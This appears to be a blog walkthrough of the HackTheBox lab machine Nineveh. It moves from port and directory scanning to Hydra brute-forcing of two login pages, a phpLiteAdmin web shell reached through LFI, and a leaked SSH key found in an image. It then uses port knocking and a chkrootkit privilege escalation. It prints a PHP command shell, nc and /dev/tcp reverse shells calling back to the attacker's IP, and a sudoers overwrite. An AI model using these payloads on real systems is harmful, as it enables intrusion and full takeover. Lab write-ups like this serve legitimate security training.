This post is about the Walkthrough of the hackthebox machine: Nineveh
Hackthebox Nineveh Walkthrough Link to heading
Reconnaissance Link to heading
Port-Scan Link to heading
sudo nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.43 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-10 18:43 EST
Nmap scan report for 10.10.10.43
Host is up (0.050s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
sudo nmap -sS -T4 -p- -sV -sC 10.10.10.43 1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-10 18:43 EST
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 44.31% done; ETC: 18:45 (0:01:02 remaining)
Nmap scan report for 10.10.10.43
Host is up (0.050s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
nmap -p 80,443 -Pn -sC -sV -oN detailed.txt 10.10.10.43
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-10 18:48 EST
Nmap scan report for 10.10.10.43
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service detection performed. Please report
sudo nmap -p 80,443 -script VULN 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-10 18:49 EST
Nmap scan report for 10.10.10.43
Host is up (0.052s latency).
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /info.php: Possible information file
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
443/tcp open https
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /db/: BlogWorx Database
|_ /db/: Potentially interesting folder
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown:
Directory Scanning Link to heading
There is a http and https websites running on the server.
To test i have run gobuster scan or http and https websites and i got 2 different subdomians
gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.43
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/11 18:48:35 Starting gobuster in directory enumeration mode
===============================================================
/department (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
/server-status (Status: 403) [Size: 299]
Progress: 95835 / 220561 (43.45%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/03/11 18:55:44 Finished
===============================================================
gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirb/common.txt -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.43
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/10 19:22:33 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/db (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/index.html (Status: 200) [Size: 49]
/server-status (Status: 403) [Size: 300]
With bigger wordlist Link to heading
gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k 2 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.43
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/17 06:57:14 Starting gobuster in directory enumeration mode
===============================================================
/db (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/server-status (Status: 403) [Size: 300]
/secure_notes (Status: 301) [Size: 319] [--> https://10.10.10.43/secure_notes/]
As per fhe above scan results, i can see 80 and 443 are open and the 2 different subdomains available for http and https site
For SSL site Link to heading
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn’t have a title (text/html). | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR | Not valid before: 2017-07-01T15:03:30
I can see a login page as well from this info
443/tcp open https |_http-csrf: Couldn’t find any CSRF vulnerabilities. |http-dombased-xss: Couldn’t find any DOM based XSS. | http-enum: | /db/: BlogWorx Database | /db/: Potentially interesting folder
For HTTP Site Link to heading
/department (Status: 301) [Size: 315] [–> http://10.10.10.43/department/] /server-status (Status: 403) [Size: 299]
Bruteforce using Hydra Link to heading
To use Hydra we need to mainly identify 4 Parameters:
<IP Address> = ""
<Login Page> = ""
<Request Body> = ""
<Error Message> =""
To identify these parameters, lets intercept the request with Burp.
Based on the intercepted values, I have filled the values for HTTPS site subdomain
= “10.10.10.43”
= “/db/index.php”
= “^PASS^&login=Log+In&proc_login=true”
=“Incorrect password.”
Now Formulate the bruteforce command using hydra. For using hydra always username is required. In this case we can give any fixed value. Remember to use “https-form” as its a ssl website.
-V- stands for Verbose which shows the username/password combination tried by Hydra
-s can be used to specify the port( in this case we have specified 443). This is can be ignored in this case as it works both on 80 and 443.
─$ hydra 10.10.10.43 -l rchitect -P /usr/share/SecLists-master/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&login=Log+In&proc_login=true:Incorrect password." -V -s 443
We have a password now
The version of phliteadmin is shown as 1.9. I can see some exploit in this version
Brute force for http-website ( username/passoword combination) Link to heading
Intercept the login request using Burp
Fill the 4 imp parameters
<IP Address> = "10.10.10.43"
<Login Page> = "/department/login.php"
<Request Body> = "username=admin&password=^PASS^"
<Error Message> ="Invalid Password!"
Hydra Command
└─$ hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form “/department/login.php:username=^USER^&password=^PASS^:Invalid Password " -V
We have password cracked now:
password: 1q2w3e4r5t
It allows to a login page below
LFI Link to heading
I can see a local file inclusion vulnarability here.
RFI Link to heading
At this stage we have look for options of making LFI vulnrabality to RFI which can grant reverse shell
I could see a [github](GitHub - F-Masood/PHPLiteAdmin-1.9.3—Exploit-PoC) explaining the phpliteadmin exploit.
Reference to above POC, I have created a database. Please note to create it with .php extension as follows:
Then edit the database by slecting them
Give any name for the table
Provide the php webshell command code as value like below. The quotes should be "” ( double)instead of ’ ‘(single)
<?php system($_GET["cmd"]);?>
The table has been created inside the database like below
The Database path for testing has menetioned here.
To access this database file( php cmd shell) we can use the LFI vulnarability which we have tested.(/etc/passwd files was accessible)
I have used the below path to access the cmd shell which have inserted though database
http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/Rchitect.php&cmd=id
http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/Rchitect.php&cmd=pwd
Reverse shell as WWW-data Link to heading
The above command “id”,“whoami” can be replaced with reverse shell script and i have used this
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 8989 >/tmp/f
Make sure you are using the url encode ( CNTRL + U) in burp while inserting code.Some times it needs to be tried mutiple times to open reverse shell.
This is how encoded request looks like:
─$ rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 41898
/bin/sh: 0: can't access tty; job control turned off
whoami
www-data
which shell
which $shell
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 4: python: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
whoami
whoami
www-data
Privilege Escalation Link to heading
There was one image which we have found and never used anywhere during directory enumeration.
Using the Strings command to get more on the image
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
0000644
0000041
0000041
00000000620
13126060277
014541
ustar
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
It seems a archive and usingbinwalk to get more
binwalk 38.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)
┌──(rocky㉿kali)-[~/hckbox/nineveh]
└─$ binwalk -e 38.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)
ls -al
total 2948
drwxr-xr-x 4 rocky rocky 4096 Mar 17 20:35 .
drwxr-xr-x 45 rocky rocky 4096 Mar 10 18:39 ..
-rw-r--r-- 1 rocky rocky 1492 Mar 10 19:32 10883.txt
-rw-r--r-- 1 rocky rocky 1603 Mar 10 19:43 24044.txt
-rw-r--r-- 1 rocky rocky 2891984 Mar 17 19:57 38.png
drwxr-xr-x 3 rocky rocky 4096 Mar 17 20:35 _38.png.extracted
-rw-r--r-- 1 rocky rocky 807 Mar 10 19:32 5480.txt
I have tried SSH ( evn if the port 22 was the open port list ) . It did not work.
┌──(rocky㉿kali)-[~/hckbox/nineveh/_38.png.extracted/secret]
└─$ ssh -i nineveh.priv 10.10.10.43
ssh: connect to host 10.10.10.43 port 22: Connection timed out
I can see some email for the user
cat /var/spool/mail/amrois
From root@nineveh.htb Fri Jun 23 14:04:19 2017
Return-Path: <root@nineveh.htb>
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
Amrois! please knock the door next time! 571 290 911
Initally i could not understand the meaning of this.Then i try to see if any services"knock" running
ps auxww | grep knoc
www-data 661 0.0 0.0 11288 936 pts/2 S+ 00:51 0:00 grep knoc
root 1302 1.0 0.2 8756 2224 ? Ss Mar17 3:14 /usr/sbin/knockd -d -i ens160
I have tested to see if any any locally running services( on the nmap scan only 2 ports 80 and 443 )
We can see the knockd configuration here
cat /etc/knockd.conf
[options]
logfile = /var/log/knockd.log
interface = ens160
[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 911,290,571
seq_timeout = 5
start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
It says if we send ( knocks) tcp packets to ports 571,290,911 in sequence the port 22 will be open.
Lets try by simple nmap script.
for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43 && sleep 1; done
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-18 05:12 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
571/tcp filtered umeter
Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-18 05:12 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
290/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-18 05:12 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
911/tcp filtered xact-backup
Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds
Try SSH immidiately after the nmap script.
ssh -i nineveh.priv amrois@10.10.10.43
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
288 packages can be updated.
207 updates are security updates.
You have mail.
Last login: Fri Mar 18 03:46:32 2022 from 10.10.14.9
amrois@nineveh:~$ sudo -l
As the Linpeas did not reavel any useful information, I have tried pspy and i could see the chkrootkit
Lets search for the exploit
As per this exploit if you create any exploit ,if you create a file named “update” under /tmp.
amrois@nineveh:/tmp$ printf '#!/bin/sh\n' > update
amrois@nineveh:/tmp$ printf '/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.9/5555 0<&1"\n' >> update
amrois@nineveh:/tmp$ chmod +x update
Once the chkroot cron runs we will get reverse shell
└─$ rlwrap nc -nvlp 5555 1 ⨯
listening on [any] 5555 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 49824
whoami
root
pwd
/root
Other method: to add the existing user to sudoers to escalate the privilege
amrois@nineveh:/tmp$ echo 'echo "amrois ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > update
amrois@nineveh:/tmp$ chmod +x update
amrois@nineveh:/tmp$ sudo bash
amrois@nineveh:/tmp$ sudo bash
root@nineveh:/tmp# whoami
root
root@nineveh:/tmp#
Key-Learnings Link to heading
The initail scan shows only port 80 and 443. When accessed both websites are different. Its important to run directory scan on both http and http websites to get all directories. In this case (db/department/secure_notes) folders revealed after the separate directory enumeration with http/https sites.
Both sites have the login pages and normally the bruteforce was not preferred by me unless i found some wordlist from server itslef. In this case both pages ( http/https) has been obtained using the hydra bruteforce even if there was a wordlist from server. I have used rockyou wordlist for bruteforce.
After login the the application running(phpliteadmin 1.9) has been identified and there is exploit available for this version.
LFI identification was tricky part here, once we created a database with php-cmdshell, it shows it can be accesisble from(/var/tmp/)folder. This was my hint to check for LFI/RFI vullnrability.
For Privilege escalation, i could not find any hints from the usual lifesaver (linpeas script). Analzing of the image and finding the ssh private key was crucial for this step.
However the SSH port was not open. Port knocking was also one more new service which we learned through this machine.